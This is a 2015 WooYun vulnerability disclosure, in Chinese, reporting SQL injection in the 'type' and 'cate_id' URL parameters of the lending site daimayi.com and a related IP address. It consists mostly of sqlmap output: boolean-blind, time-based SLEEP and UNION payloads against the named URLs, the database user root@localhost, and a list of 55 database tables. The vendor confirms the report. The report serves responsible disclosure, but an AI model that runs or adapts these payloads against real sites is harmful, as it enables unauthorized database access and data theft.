漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0141215
漏洞标题:贷蚂蚁多站多处SQL注入漏洞
相关厂商:daimayi.com
漏洞作者: 路人甲
提交时间:2015-09-15 09:36
修复时间:2015-11-03 11:52
公开时间:2015-11-03 11:52
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-09-15: 细节已通知厂商并且等待厂商处理中
2015-09-19: 厂商已经确认,细节仅向厂商公开
2015-09-29: 细节向核心白帽子及相关领域专家公开
2015-10-09: 细节向普通白帽子公开
2015-10-19: 细节向实习白帽子公开
2015-11-03: 细节向公众公开
简要描述:
123
详细说明:
发之前搜了一下,这不算重复吧。。
参数 type
漏洞证明:
sqlmap identified the following injection point(s) with a total of 44 HTTP(s) re
quests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://daimayi.com:80/index.php/Ask/index/type/2) AND 8385=8385 AND
(7129=7129
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://daimayi.com:80/index.php/Ask/index/type/2) AND (SELECT * FRO
M (SELECT(SLEEP(5)))xBwC) AND (3886=3886
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: http://daimayi.com:80/index.php/Ask/index/type/2) UNION ALL SELECT
CONCAT(0x71706a7171,0x6668696e587447695775,0x71706b7171),NULL,NULL,NULL,NULL,NUL
L,NULL,NULL,NULL,NULL--
---
[07:55:31] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
current user: 'root@localhost'
current database: 'huomayi'
[55 tables]
+----------------------+
| t_access |
| t_ad |
| t_adboard |
| t_admin |
| t_age |
| t_apply |
| t_area |
| t_article |
| t_article_cate |
| t_ask |
| t_ask_cate |
| t_auto_get |
| t_bank |
| t_buy_receive |
| t_car_production |
| t_cate |
| t_city |
| t_colony |
| t_cover_city |
| t_credit |
| t_flink |
| t_flink_cate |
| t_friendship |
| t_get_apply |
| t_get_jilt |
| t_group |
| t_house_property |
| t_institution |
| t_institution_type |
| t_jilt |
| t_jilt_keyword |
| t_keyword |
| t_loan_type |
| t_made_task |
| t_member |
| t_monthly_income |
| t_nav |
| t_node |
| t_photo |
| t_product |
| t_product_allocation |
| t_product_bind |
| t_receive |
| t_receive_keyword |
| t_recharge |
| t_repayment_mode |
| t_role |
| t_setting |
| t_social_security |
| t_spend |
| t_strategy |
| t_strategy_cate |
| t_test |
| t_work_place |
| t_work_time |
+----------------------+
你懂得 cate_id
sqlmap identified the following injection point(s) with a total of 128 HTTP(s) r
equests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://112.124.212.5:80/index.php/Strategy/index/cate_id/2) AND 705
6=7056 AND (8338=8338
Type: UNION query
Title: MySQL UNION query (72) - 12 columns
Payload: http://112.124.212.5:80/index.php/Strategy/index/cate_id/2) UNION A
LL SELECT 72,72,72,CONCAT(0x7176767071,0x717348504e534a4d4e48,0x7171627871),72,7
2,72,72,72,72,72,72#
---
[08:07:54] [INFO] testing MySQL
[08:07:56] [INFO] confirming MySQL
[08:07:57] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
current database: 'huomayi'
Database: huomayi
[55 tables]
+----------------------+
| t_access |
| t_ad |
| t_adboard |
| t_admin |
| t_age |
| t_apply |
| t_area |
| t_article |
| t_article_cate |
| t_ask |
| t_ask_cate |
| t_auto_get |
| t_bank |
| t_buy_receive |
| t_car_production |
| t_cate |
| t_city |
| t_colony |
| t_cover_city |
| t_credit |
| t_flink |
| t_flink_cate |
| t_friendship |
| t_get_apply |
| t_get_jilt |
| t_group |
| t_house_property |
| t_institution |
| t_institution_type |
| t_jilt |
| t_jilt_keyword |
| t_keyword |
| t_loan_type |
| t_made_task |
| t_member |
| t_monthly_income |
| t_nav |
| t_node |
| t_photo |
| t_product |
| t_product_allocation |
| t_product_bind |
| t_receive |
| t_receive_keyword |
| t_recharge |
| t_repayment_mode |
| t_role |
| t_setting |
| t_social_security |
| t_spend |
| t_strategy |
| t_strategy_cate |
| t_test |
| t_work_place |
| t_work_time |
+----------------------+
修复方案:
你懂得
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-09-19 11:50
厂商回复:
谢谢路人甲,已经在修复了!
最新状态:
暂无